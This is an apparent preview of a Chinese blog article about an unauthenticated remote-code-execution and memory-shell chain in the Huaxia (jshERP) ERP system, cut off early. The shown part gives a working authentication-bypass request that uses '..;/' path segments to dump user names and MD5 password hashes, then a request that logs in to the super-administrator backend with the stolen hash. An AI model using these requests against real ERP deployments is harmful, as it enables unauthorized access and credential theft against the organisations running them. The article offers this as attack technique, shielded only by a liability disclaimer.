华夏ERP全版本未授权RCE及内存马注入 | 干货

文章预览

免责声明： 由于传播、利用本公众号李白你好所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号李白你好及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！ 1 ► 前言 华夏ERP全版本未授权RCE及内存马注入。 本文来自 《实战攻防》开源应用渗透利用篇 。作者： xiuxian 实战攻防 & & 实战渗透强势来袭 2 ► 权限绕过 目前最新版V3.3 GET/jshERP-boot/platformConfig/getPlatform/..; /..;/ ..; /jshERP-boot/user /getAllList HTTP/ 1.1 通过getAllList读取用户名，密码MD5值。 Hash登录 使用读取得密码MD5值登录超级管理员后台。 POST /jshERP-boot/user/login HTTP/1.1 Host : IP Content-Length : 67 Accept : application/json, text/plain, */* User-Agent : M ………………………………